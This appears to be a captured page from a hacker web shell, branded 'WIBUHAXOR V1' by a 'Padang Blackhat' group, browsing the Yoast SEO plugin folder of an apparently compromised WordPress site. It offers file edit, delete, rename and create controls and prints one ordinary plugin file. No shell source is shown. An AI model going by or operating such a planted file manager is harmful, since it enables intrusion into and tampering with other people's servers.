-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
plugins
/
wordpress-seo
/
inc
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
exceptions
--
NONE
options
--
NONE
sitemaps
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
class-addon-manager.php
23.772KB
Edit File
Delete File
Rename
class-my-yoast-api-request.php
4.775KB
Edit File
Delete File
Rename
class-post-type.php
2.767KB
Edit File
Delete File
Rename
class-rewrite.php
7.043KB
Edit File
Delete File
Rename
class-upgrade-history.php
2.87KB
Edit File
Delete File
Rename
class-upgrade.php
37.251KB
Edit File
Delete File
Rename
class-wpseo-admin-bar-menu.php
19.016KB
Edit File
Delete File
Rename
class-wpseo-content-images.php
2.552KB
Edit File
Delete File
Rename
class-wpseo-custom-fields.php
1.45KB
Edit File
Delete File
Rename
class-wpseo-custom-taxonomies.php
1.59KB
Edit File
Delete File
Rename
class-wpseo-features.php
0.77KB
Edit File
Delete File
Rename
class-wpseo-image-utils.php
13.652KB
Edit File
Delete File
Rename
class-wpseo-installation.php
1.092KB
Edit File
Delete File
Rename
class-wpseo-primary-term.php
1.63KB
Edit File
Delete File
Rename
class-wpseo-rank.php
5.708KB
Edit File
Delete File
Rename
class-wpseo-replace-vars.php
50.236KB
Edit File
Delete File
Rename
class-wpseo-replacement-variable.php
1.343KB
Edit File
Delete File
Rename
class-wpseo-shortlinker.php
3.492KB
Edit File
Delete File
Rename
class-wpseo-statistics.php
1.409KB
Edit File
Delete File
Rename
class-wpseo-utils.php
38.105KB
Edit File
Delete File
Rename
date-helper.php
1.711KB
Edit File
Delete File
Rename
health-check-curl-version.php
4.477KB
Edit File
Delete File
Rename
health-check-links-table-not-accessible.php
2.258KB
Edit File
Delete File
Rename
health-check-page-comments.php
1.692KB
Edit File
Delete File
Rename
health-check-postname-permalink.php
1.733KB
Edit File
Delete File
Rename
health-check-ryte.php
8.259KB
Edit File
Delete File
Rename
health-check.php
4.463KB
Edit File
Delete File
Rename
interface-wpseo-wordpress-ajax-integration.php
0.287KB
Edit File
Delete File
Rename
interface-wpseo-wordpress-integration.php
0.34KB
Edit File
Delete File
Rename
language-utils.php
2.552KB
Edit File
Delete File
Rename
wpseo-functions-deprecated.php
0.298KB
Edit File
Delete File
Rename
wpseo-functions.php
11.042KB
Edit File
Delete File
Rename
wpseo-non-ajax-functions.php
1.556KB
Edit File
Delete File
Rename
<?php /** * WPSEO plugin file. * * @package WPSEO\Internals * @since 5.9.0 */ /** * Group of language utility methods for use by WPSEO. * All methods are static, this is just a sort of namespacing class wrapper. */ class WPSEO_Language_Utils { /** * Returns the language part of a given locale, defaults to english when the $locale is empty. * * @param string|null $locale The locale to get the language of. * * @return string The language part of the locale. */ public static function get_language( $locale = null ) { $language = 'en'; if ( empty( $locale ) || ! is_string( $locale ) ) { return $language; } $locale_parts = explode( '_', $locale ); if ( ! empty( $locale_parts[0] ) && ( strlen( $locale_parts[0] ) === 2 || strlen( $locale_parts[0] ) === 3 ) ) { $language = $locale_parts[0]; } return $language; } /** * Returns the user locale for the language to be used in the admin. * * WordPress 4.7 introduced the ability for users to specify an Admin language * different from the language used on the front end. This checks if the feature * is available and returns the user's language, with a fallback to the site's language. * Can be removed when support for WordPress 4.6 will be dropped, in favor * of WordPress get_user_locale() that already fallbacks to the site's locale. * * @deprecated 15.6 * @codeCoverageIgnore * * @return string The locale. */ public static function get_user_locale() { _deprecated_function( __METHOD__, 'WPSEO 15.5', 'get_user_locale' ); return get_user_locale(); } /** * Returns the full name for the sites' language. * * @return string The language name. */ public static function get_site_language_name() { require_once ABSPATH . 'wp-admin/includes/translation-install.php'; $translations = wp_get_available_translations(); $locale = get_locale(); $language = isset( $translations[ $locale ] ) ? $translations[ $locale ]['native_name'] : 'English (US)'; return $language; } /** * Returns the l10n array for the knowledge graph company info missing. * * @return array The l10n array. */ public static function get_knowledge_graph_company_info_missing_l10n() { return [ 'URL' => esc_url( WPSEO_Shortlinker::get( 'https://yoa.st/3r3' ) ), /* translators: 1: expands to a link opening tag; 2: expands to a link closing tag */ 'message' => esc_html__( 'A company name and logo need to be set for structured data to work properly. %1$sLearn more about the importance of structured data.%2$s', 'wordpress-seo' ), ]; } }
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat